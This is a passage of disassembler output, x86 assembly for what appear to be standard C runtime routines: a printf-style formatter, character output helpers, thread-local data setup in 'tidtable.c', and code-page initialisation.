mov [ebp+var_26C], eax
mov [ebp+var_268], ecx
mov edx, [ebp+var_4]
or dh, 1
mov [ebp+var_4], edx
jmp short loc_42883F
; ---------------------------------------------------------------------------
loc_428827: ; CODE XREF: sub_427F60+887�j
; sub_427F60+890�j ...
mov eax, [ebp+var_278]
mov [ebp+var_26C], eax
mov ecx, [ebp+var_274]
mov [ebp+var_268], ecx
loc_42883F: ; CODE XREF: sub_427F60+8C5�j
mov edx, [ebp+var_4]
and edx, 8000h
test edx, edx
jnz short loc_428867
mov eax, [ebp+var_26C]
mov ecx, [ebp+var_268]
and ecx, 0
mov [ebp+var_26C], eax
mov [ebp+var_268], ecx
loc_428867: ; CODE XREF: sub_427F60+8EA�j
cmp [ebp+var_234], 0
jge short loc_42887C
mov [ebp+var_234], 1
jmp short loc_428885
; ---------------------------------------------------------------------------
loc_42887C: ; CODE XREF: sub_427F60+90E�j
mov edx, [ebp+var_4]
and edx, 0FFFFFFF7h
mov [ebp+var_4], edx
loc_428885: ; CODE XREF: sub_427F60+91A�j
mov eax, [ebp+var_26C]
or eax, [ebp+var_268]
test eax, eax
jnz short loc_42889C
mov [ebp+var_10], 0
loc_42889C: ; CODE XREF: sub_427F60+933�j
lea ecx, [ebp+var_29]
mov [ebp+var_20], ecx
loc_4288A2: ; CODE XREF: sub_427F60+9EB�j
mov edx, [ebp+var_234]
mov eax, [ebp+var_234]
sub eax, 1
mov [ebp+var_234], eax
test edx, edx
jg short loc_4288CF
mov ecx, [ebp+var_26C]
or ecx, [ebp+var_268]
test ecx, ecx
jz loc_428950
loc_4288CF: ; CODE XREF: sub_427F60+959�j
mov eax, [ebp+var_238]
cdq
push edx
push eax
mov edx, [ebp+var_268]
push edx
mov eax, [ebp+var_26C]
push eax
call sub_4214F0
add eax, 30h
mov [ebp+var_270], eax
mov eax, [ebp+var_238]
cdq
push edx
push eax
mov ecx, [ebp+var_268]
push ecx
mov edx, [ebp+var_26C]
push edx
call sub_421480
mov [ebp+var_26C], eax
mov [ebp+var_268], edx
cmp [ebp+var_270], 39h
jle short loc_428937
mov eax, [ebp+var_270]
add eax, [ebp+var_230]
mov [ebp+var_270], eax
loc_428937: ; CODE XREF: sub_427F60+9C3�j
mov ecx, [ebp+var_20]
mov dl, byte ptr [ebp+var_270]
mov [ecx], dl
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
jmp loc_4288A2
; ---------------------------------------------------------------------------
loc_428950: ; CODE XREF: sub_427F60+969�j
lea ecx, [ebp+var_29]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_4]
and eax, 200h
test eax, eax
jz short loc_428997
mov ecx, [ebp+var_20]
movsx edx, byte ptr [ecx]
cmp edx, 30h
jnz short loc_42897F
cmp [ebp+var_24], 0
jnz short loc_428997
loc_42897F: ; CODE XREF: sub_427F60+A17�j
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_20]
mov byte ptr [ecx], 30h
mov edx, [ebp+var_24]
add edx, 1
mov [ebp+var_24], edx
loc_428997: ; CODE XREF: sub_427F60+371�j
; sub_427F60+385�j ...
cmp [ebp+var_23C], 0
jnz loc_428B72
mov eax, [ebp+var_4]
and eax, 40h
test eax, eax
jz short loc_4289FD
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jz short loc_4289CB
mov [ebp+var_240], 2Dh
mov [ebp+var_10], 1
jmp short loc_4289FD
; ---------------------------------------------------------------------------
loc_4289CB: ; CODE XREF: sub_427F60+A59�j
mov edx, [ebp+var_4]
and edx, 1
test edx, edx
jz short loc_4289E5
mov [ebp+var_240], 2Bh
mov [ebp+var_10], 1
jmp short loc_4289FD
; ---------------------------------------------------------------------------
loc_4289E5: ; CODE XREF: sub_427F60+A73�j
mov eax, [ebp+var_4]
and eax, 2
test eax, eax
jz short loc_4289FD
mov [ebp+var_240], 20h
mov [ebp+var_10], 1
loc_4289FD: ; CODE XREF: sub_427F60+A4C�j
; sub_427F60+A69�j ...
mov ecx, [ebp+var_244]
sub ecx, [ebp+var_24]
sub ecx, [ebp+var_10]
mov [ebp+var_27C], ecx
mov edx, [ebp+var_4]
and edx, 0Ch
test edx, edx
jnz short loc_428A35
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 20h
call sub_428D10
add esp, 10h
loc_428A35: ; CODE XREF: sub_427F60+AB7�j
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_10]
push edx
lea eax, [ebp+var_240]
push eax
call sub_428D50
add esp, 10h
mov ecx, [ebp+var_4]
and ecx, 8
test ecx, ecx
jz short loc_428A83
mov edx, [ebp+var_4]
and edx, 4
test edx, edx
jnz short loc_428A83
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 30h
call sub_428D10
add esp, 10h
loc_428A83: ; CODE XREF: sub_427F60+AFB�j
; sub_427F60+B05�j
cmp [ebp+var_1C], 0
jz loc_428B31
cmp [ebp+var_24], 0
jle loc_428B31
mov eax, [ebp+var_20]
mov [ebp+var_280], eax
mov ecx, [ebp+var_24]
mov [ebp+var_284], ecx
loc_428AA9: ; CODE XREF: sub_427F60+BCA�j
mov edx, [ebp+var_284]
mov eax, [ebp+var_284]
sub eax, 1
mov [ebp+var_284], eax
test edx, edx
jz short loc_428B2F
mov ecx, [ebp+var_280]
mov dx, [ecx]
mov [ebp+var_2A6], dx
mov ax, [ebp+var_2A6]
push eax
lea ecx, [ebp+var_288]
push ecx
mov edx, [ebp+var_280]
add edx, 2
mov [ebp+var_280], edx
call sub_431A80
add esp, 8
mov [ebp+var_28C], eax
cmp [ebp+var_28C], 0
jg short loc_428B09
jmp short loc_428B2F
; ---------------------------------------------------------------------------
loc_428B09: ; CODE XREF: sub_427F60+BA5�j
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_28C]
push edx
lea eax, [ebp+var_288]
push eax
call sub_428D50
add esp, 10h
jmp loc_428AA9
; ---------------------------------------------------------------------------
loc_428B2F: ; CODE XREF: sub_427F60+B60�j
; sub_427F60+BA7�j
jmp short loc_428B4C
; ---------------------------------------------------------------------------
loc_428B31: ; CODE XREF: sub_427F60+B27�j
; sub_427F60+B31�j
lea ecx, [ebp+var_22C]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+var_20]
push ecx
call sub_428D50
add esp, 10h
loc_428B4C: ; CODE XREF: sub_427F60:loc_428B2F�j
mov edx, [ebp+var_4]
and edx, 4
test edx, edx
jz short loc_428B72
lea eax, [ebp+var_22C]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_27C]
push edx
push 20h
call sub_428D10
add esp, 10h
loc_428B72: ; CODE XREF: sub_427F60+AD�j
; sub_427F60+155�j ...
jmp loc_427F84
; ---------------------------------------------------------------------------
loc_428B77: ; CODE XREF: sub_427F60+3B�j
; sub_427F60+48�j
mov eax, [ebp+var_22C]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_427F60 endp
; ---------------------------------------------------------------------------
off_428B84 dd offset loc_428020 ; DATA XREF: sub_427F60+B9�r
dd offset loc_4280BA
dd offset loc_4280FC
dd offset loc_42816B
dd offset loc_4281C3
dd offset loc_4281D2
dd offset loc_42821E
dd offset loc_4282B1
off_428BA4 dd offset loc_428148 ; DATA XREF: sub_427F60+1CC�r
dd offset loc_428153
dd offset loc_42813E
dd offset loc_428133
dd offset loc_42815E
dd offset loc_428166
byte_428BBC db 0 ; DATA XREF: sub_427F60+1C6�r
db 2 dup(5), 1
dd 5050505h, 2050505h, 5050305h
db 4
off_428BCD dd offset loc_428260 ; DATA XREF: sub_427F60+2EE�r
dd offset loc_428299
dd offset loc_428255
dd offset loc_4282A3
dd offset loc_4282AC
byte_428BE1 db 0, 1Eh dup(4), 1, 3 dup(4), 2, 0Ah dup(4), 3 ; DATA XREF: sub_427F60+2E8�r
off_428C10 dd offset loc_4282EC ; DATA XREF: sub_427F60+385�r
dd offset loc_428580
dd offset loc_428410
dd offset loc_4286B9
dd offset loc_42837B
dd offset loc_428301
dd offset loc_42868B
dd offset loc_428590
dd offset loc_428535
dd offset loc_428705
dd offset loc_4286AF
dd offset loc_428426
dd offset loc_4286A3
dd offset loc_4286C5
dd offset loc_428997
byte_428C4C db 0, 0Eh, 1, 0Eh, 1, 0Bh dup(0Eh), 2, 4 dup(0Eh), 3, 0Eh
; DATA XREF: sub_427F60+37F�r
db 4, 8 dup(0Eh), 5, 6, 3 dup(7), 0Eh, 6, 4 dup(0Eh), 8
db 9, 0Ah, 2 dup(0Eh), 0Bh, 0Eh, 0Ch, 2 dup(0Eh), 0Dh
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428C90 proc near ; CODE XREF: sub_427F60+F5�p
; sub_427F60+14D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_4]
mov [edx+4], ecx
mov eax, [ebp+arg_4]
cmp dword ptr [eax+4], 0
jl short loc_428CD2
mov ecx, [ebp+arg_4]
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
movsx ecx, byte ptr [ebp+arg_0]
and ecx, 0FFh
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_428CE5
; ---------------------------------------------------------------------------
loc_428CD2: ; CODE XREF: sub_428C90+1A�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_427CE0
add esp, 8
mov [ebp+var_4], eax
loc_428CE5: ; CODE XREF: sub_428C90+40�j
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_428CF6
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0FFFFFFFFh
jmp short loc_428D03
; ---------------------------------------------------------------------------
loc_428CF6: ; CODE XREF: sub_428C90+59�j
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_428D03: ; CODE XREF: sub_428C90+64�j
mov esp, ebp
pop ebp
retn
sub_428C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428D10 proc near ; CODE XREF: sub_427F60+ACD�p
; sub_427F60+B1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
loc_428D13: ; CODE XREF: sub_428D10:loc_428D41�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
test eax, eax
jle short loc_428D43
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_428C90
add esp, 0Ch
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0FFFFFFFFh
jnz short loc_428D41
jmp short loc_428D43
; ---------------------------------------------------------------------------
loc_428D41: ; CODE XREF: sub_428D10+2D�j
jmp short loc_428D13
; ---------------------------------------------------------------------------
loc_428D43: ; CODE XREF: sub_428D10+11�j
; sub_428D10+2F�j
pop ebp
retn
sub_428D10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428D50 proc near ; CODE XREF: sub_427F60+AEB�p
; sub_427F60+BC2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
loc_428D54: ; CODE XREF: sub_428D50:loc_428D94�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
test eax, eax
jle short loc_428D96
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
call sub_428C90
add esp, 0Ch
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0FFFFFFFFh
jnz short loc_428D94
jmp short loc_428D96
; ---------------------------------------------------------------------------
loc_428D94: ; CODE XREF: sub_428D50+40�j
jmp short loc_428D54
; ---------------------------------------------------------------------------
loc_428D96: ; CODE XREF: sub_428D50+12�j
; sub_428D50+42�j
mov esp, ebp
pop ebp
retn
sub_428D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428DA0 proc near ; CODE XREF: sub_427F60+218�p
; sub_427F60+27F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 4
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov eax, [ecx-4]
pop ebp
retn
sub_428DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428DC0 proc near ; CODE XREF: sub_427F60+7D5�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 8
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
sub ecx, 8
mov eax, [ecx]
mov edx, [ecx+4]
pop ebp
retn
sub_428DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428DE0 proc near ; CODE XREF: sub_427F60+3B2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 4
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov ax, [ecx-4]
pop ebp
retn
sub_428DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428E00 proc near ; CODE XREF: _0:loc_422194�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_4231A0
call ds:dword_4F54CC ; TlsAlloc
mov ds:dword_453E04, eax
cmp ds:dword_453E04, 0FFFFFFFFh
jnz short loc_428E21
xor eax, eax
jmp short loc_428E7E
; ---------------------------------------------------------------------------
loc_428E21: ; CODE XREF: sub_428E00+1B�j
push 61h
push offset aTidtable_c ; "tidtable.c"
push 2
push 74h
push 1
call sub_41C2D0
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_428E54
mov eax, [ebp+var_4]
push eax
mov ecx, ds:dword_453E04
push ecx
call ds:dword_4F54C8 ; TlsSetValue
test eax, eax
jnz short loc_428E58
loc_428E54: ; CODE XREF: sub_428E00+3D�j
xor eax, eax
jmp short loc_428E7E
; ---------------------------------------------------------------------------
loc_428E58: ; CODE XREF: sub_428E00+52�j
mov edx, [ebp+var_4]
push edx
call sub_428EC0
add esp, 4
call ds:dword_4F54C4 ; GetCurrentThreadId
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0FFFFFFFFh
mov eax, 1
loc_428E7E: ; CODE XREF: sub_428E00+1F�j
; sub_428E00+56�j
mov esp, ebp
pop ebp
retn
sub_428E00 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_4231E0
cmp ds:dword_453E04, 0FFFFFFFFh
jz short loc_428EB7
mov eax, ds:dword_453E04
push eax
call ds:dword_4F54D0 ; TlsFree
mov ds:dword_453E04, 0FFFFFFFFh
loc_428EB7: ; CODE XREF: _0:00428E9F�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428EC0 proc near ; CODE XREF: sub_428E00+5C�p
; sub_428EE0+5E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax+50h], offset dword_454308
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+14h], 1
pop ebp
retn
sub_428EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428EE0 proc near ; CODE XREF: sub_41EB60+3�p
; sub_41EB70+4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_8], eax
mov eax, ds:dword_453E04
push eax
call ds:dword_4F54D8 ; TlsGetValue
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_428F67
push 0E7h
push offset aTidtable_c ; "tidtable.c"
push 2
push 74h
push 1
call sub_41C2D0
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_428F5D
mov ecx, [ebp+var_4]
push ecx
mov edx, ds:dword_453E04
push edx
call ds:dword_4F54C8 ; TlsSetValue
test eax, eax
jz short loc_428F5D
mov eax, [ebp+var_4]
push eax
call sub_428EC0
add esp, 4
call ds:dword_4F54C4 ; GetCurrentThreadId
mov ecx, [ebp+var_4]
mov [ecx], eax
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0FFFFFFFFh
jmp short loc_428F67
; ---------------------------------------------------------------------------
loc_428F5D: ; CODE XREF: sub_428EE0+43�j
; sub_428EE0+58�j
push 10h
call sub_422270
add esp, 4
loc_428F67: ; CODE XREF: sub_428EE0+22�j
; sub_428EE0+7B�j
mov eax, [ebp+var_8]
push eax
call ds:dword_4F54D4 ; RtlRestoreLastWin32Error
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_428EE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp ds:dword_453E04, 0FFFFFFFFh
jz loc_429085
cmp dword ptr [ebp+8], 0
jnz short loc_428FA5
mov eax, ds:dword_453E04
push eax
call ds:dword_4F54D8 ; TlsGetValue
mov [ebp+8], eax
loc_428FA5: ; CODE XREF: _0:00428F94�j
cmp dword ptr [ebp+8], 0
jz loc_429076
mov ecx, [ebp+8]
cmp dword ptr [ecx+24h], 0
jz short loc_428FC9
push 2
mov edx, [ebp+8]
mov eax, [edx+24h]
push eax
call sub_41CA10
add esp, 8
loc_428FC9: ; CODE XREF: _0:00428FB6�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+28h], 0
jz short loc_428FE3
push 2
mov edx, [ebp+8]
mov eax, [edx+28h]
push eax
call sub_41CA10
add esp, 8
loc_428FE3: ; CODE XREF: _0:00428FD0�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+30h], 0
jz short loc_428FFD
push 2
mov edx, [ebp+8]
mov eax, [edx+30h]
push eax
call sub_41CA10
add esp, 8
loc_428FFD: ; CODE XREF: _0:00428FEA�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+38h], 0
jz short loc_429017
push 2
mov edx, [ebp+8]
mov eax, [edx+38h]
push eax
call sub_41CA10
add esp, 8
loc_429017: ; CODE XREF: _0:00429004�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+40h], 0
jz short loc_429031
push 2
mov edx, [ebp+8]
mov eax, [edx+40h]
push eax
call sub_41CA10
add esp, 8
loc_429031: ; CODE XREF: _0:0042901E�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+44h], 0
jz short loc_42904B
push 2
mov edx, [ebp+8]
mov eax, [edx+44h]
push eax
call sub_41CA10
add esp, 8
loc_42904B: ; CODE XREF: _0:00429038�j
mov ecx, [ebp+8]
cmp dword ptr [ecx+50h], offset dword_454308
jz short loc_429068
push 2
mov edx, [ebp+8]
mov eax, [edx+50h]
push eax
call sub_41CA10
add esp, 8
loc_429068: ; CODE XREF: _0:00429055�j
push 2
mov ecx, [ebp+8]
push ecx
call sub_41CA10
add esp, 8
loc_429076: ; CODE XREF: _0:00428FA9�j
push 0
mov edx, ds:dword_453E04
push edx
call ds:dword_4F54C8 ; TlsSetValue
loc_429085: ; CODE XREF: _0:00428F8A�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_4F54C4 ; GetCurrentThreadId
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call ds:dword_4F54DC ; GetCurrentThread
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4290B0 proc near ; CODE XREF: sub_429890+E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 19h
call sub_423280
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_429400
add esp, 4
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
cmp ecx, ds:dword_4F37CC
jnz short loc_4290EB
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp loc_4293F0
; ---------------------------------------------------------------------------
loc_4290EB: ; CODE XREF: sub_4290B0+28�j
cmp [ebp+arg_0], 0
jnz short loc_42910C
call sub_4294E0
call sub_429560
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp loc_4293F0
; ---------------------------------------------------------------------------
loc_42910C: ; CODE XREF: sub_4290B0+3F�j
mov [ebp+var_4], 0
jmp short loc_42911E
; ---------------------------------------------------------------------------
loc_429115: ; CODE XREF: sub_4290B0:loc_42926A�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42911E: ; CODE XREF: sub_4290B0+63�j
cmp [ebp+var_4], 5
jnb loc_42926F
mov eax, [ebp+var_4]
imul eax, 30h
mov ecx, ds:dword_453E10[eax]
cmp ecx, [ebp+arg_0]
jnz loc_42926A
mov [ebp+var_24], 0
jmp short loc_42914F
; ---------------------------------------------------------------------------
loc_429146: ; CODE XREF: sub_4290B0+B2�j
mov edx, [ebp+var_24]
add edx, 1
mov [ebp+var_24], edx
loc_42914F: ; CODE XREF: sub_4290B0+94�j
cmp [ebp+var_24], 101h
jnb short loc_429164
mov eax, [ebp+var_24]
mov ds:byte_4F38E0[eax], 0
jmp short loc_429146
; ---------------------------------------------------------------------------
loc_429164: ; CODE XREF: sub_4290B0+A6�j
mov [ebp+var_C], 0
jmp short loc_429176
; ---------------------------------------------------------------------------
loc_42916D: ; CODE XREF: sub_4290B0:loc_4291F2�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_429176: ; CODE XREF: sub_4290B0+BB�j
cmp [ebp+var_C], 4
jnb short loc_4291F7
mov edx, [ebp+var_4]
imul edx, 30h
mov eax, [ebp+var_C]
lea ecx, dword_453E20[edx+eax*8]
mov [ebp+var_8], ecx
jmp short loc_42919A
; ---------------------------------------------------------------------------
loc_429191: ; CODE XREF: sub_4290B0:loc_4291F0�j
mov edx, [ebp+var_8]
add edx, 2
mov [ebp+var_8], edx
loc_42919A: ; CODE XREF: sub_4290B0+DF�j
mov eax, [ebp+var_8]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_4291F2
mov edx, [ebp+var_8]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_4291F2
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_24], edx
jmp short loc_4291C6
; ---------------------------------------------------------------------------
loc_4291BD: ; CODE XREF: sub_4290B0+13E�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_4291C6: ; CODE XREF: sub_4290B0+10B�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dl, [ecx+1]
cmp [ebp+var_24], edx
ja short loc_4291F0
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
mov dl, ds:byte_4F38E1[eax]
or dl, ds:byte_453E08[ecx]
mov eax, [ebp+var_24]
mov ds:byte_4F38E1[eax], dl
jmp short loc_4291BD
; ---------------------------------------------------------------------------
loc_4291F0: ; CODE XREF: sub_4290B0+121�j
jmp short loc_429191
; ---------------------------------------------------------------------------
loc_4291F2: ; CODE XREF: sub_4290B0+F3�j
; sub_4290B0+FF�j
jmp loc_42916D
; ---------------------------------------------------------------------------
loc_4291F7: ; CODE XREF: sub_4290B0+CA�j
mov ecx, [ebp+arg_0]
mov ds:dword_4F37CC, ecx
mov ds:dword_4F37DC, 1
mov edx, ds:dword_4F37CC
push edx
call sub_429460
add esp, 4
mov ds:dword_4F39E4, eax
mov [ebp+var_C], 0
jmp short loc_429230
; ---------------------------------------------------------------------------
loc_429227: ; CODE XREF: sub_4290B0+1A2�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_429230: ; CODE XREF: sub_4290B0+175�j
cmp [ebp+var_C], 6
jnb short loc_429254
mov ecx, [ebp+var_4]
imul ecx, 30h
mov edx, [ebp+var_C]
mov eax, [ebp+var_C]
mov cx, ds:word_453E14[ecx+eax*2]
mov ds:word_4F37D0[edx*2], cx
jmp short loc_429227
; ---------------------------------------------------------------------------
loc_429254: ; CODE XREF: sub_4290B0+184�j
call sub_429560
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp loc_4293F0
; ---------------------------------------------------------------------------
loc_42926A: ; CODE XREF: sub_4290B0+87�j
jmp loc_429115
; ---------------------------------------------------------------------------
loc_42926F: ; CODE XREF: sub_4290B0+72�j
lea edx, [ebp+var_20]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F54E0 ; GetCPInfo
cmp eax, 1
jnz loc_4293C2
mov [ebp+var_24], 0
jmp short loc_429298
; ---------------------------------------------------------------------------
loc_42928F: ; CODE XREF: sub_4290B0+1FB�j
mov ecx, [ebp+var_24]
add ecx, 1
mov [ebp+var_24], ecx
loc_429298: ; CODE XREF: sub_4290B0+1DD�j
cmp [ebp+var_24], 101h
jnb short loc_4292AD
mov edx, [ebp+var_24]
mov ds:byte_4F38E0[edx], 0
jmp short loc_42928F
; ---------------------------------------------------------------------------
loc_4292AD: ; CODE XREF: sub_4290B0+1EF�j
mov eax, [ebp+arg_0]
mov ds:dword_4F37CC, eax
mov ds:dword_4F39E4, 0
cmp [ebp+var_20], 1
jbe loc_42937E
lea ecx, [ebp+var_1A]
mov [ebp+var_28], ecx
jmp short loc_4292DA
; ---------------------------------------------------------------------------
loc_4292D1: ; CODE XREF: sub_4290B0:loc_42932A�j
mov edx, [ebp+var_28]
add edx, 2
mov [ebp+var_28], edx
loc_4292DA: ; CODE XREF: sub_4290B0+21F�j
mov eax, [ebp+var_28]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42932C
mov edx, [ebp+var_28]
xor eax, eax
mov al, [edx+1]
test eax, eax
jz short loc_42932C
mov ecx, [ebp+var_28]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_24], edx
jmp short loc_429306
; ---------------------------------------------------------------------------
loc_4292FD: ; CODE XREF: sub_4290B0+278�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_429306: ; CODE XREF: sub_4290B0+24B�j
mov ecx, [ebp+var_28]
xor edx, edx
mov dl, [ecx+1]
cmp [ebp+var_24], edx
ja short loc_42932A
mov eax, [ebp+var_24]
mov cl, ds:byte_4F38E1[eax]
or cl, 4
mov edx, [ebp+var_24]
mov ds:byte_4F38E1[edx], cl
jmp short loc_4292FD
; ---------------------------------------------------------------------------
loc_42932A: ; CODE XREF: sub_4290B0+261�j
jmp short loc_4292D1
; ---------------------------------------------------------------------------
loc_42932C: ; CODE XREF: sub_4290B0+233�j
; sub_4290B0+23F�j
mov [ebp+var_24], 1
jmp short loc_42933E
; ---------------------------------------------------------------------------
loc_429335: ; CODE XREF: sub_4290B0+2AC�j
mov eax, [ebp+var_24]
add eax, 1
mov [ebp+var_24], eax
loc_42933E: ; CODE XREF: sub_4290B0+283�j
cmp [ebp+var_24], 0FFh
jnb short loc_42935E
mov ecx, [ebp+var_24]
mov dl, ds:byte_4F38E1[ecx]
or dl, 8
mov eax, [ebp+var_24]
mov ds:byte_4F38E1[eax], dl
jmp short loc_429335
; ---------------------------------------------------------------------------
loc_42935E: ; CODE XREF: sub_4290B0+295�j
mov ecx, ds:dword_4F37CC
push ecx
call sub_429460
add esp, 4
mov ds:dword_4F39E4, eax
mov ds:dword_4F37DC, 1
jmp short loc_429388
; ---------------------------------------------------------------------------
loc_42937E: ; CODE XREF: sub_4290B0+213�j
mov ds:dword_4F37DC, 0
loc_429388: ; CODE XREF: sub_4290B0+2CC�j
mov [ebp+var_C], 0
jmp short loc_42939A
; ---------------------------------------------------------------------------
loc_429391: ; CODE XREF: sub_4290B0+2FD�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_42939A: ; CODE XREF: sub_4290B0+2DF�j
cmp [ebp+var_C], 6
jnb short loc_4293AF
mov eax, [ebp+var_C]
mov ds:word_4F37D0[eax*2], 0
jmp short loc_429391
; ---------------------------------------------------------------------------
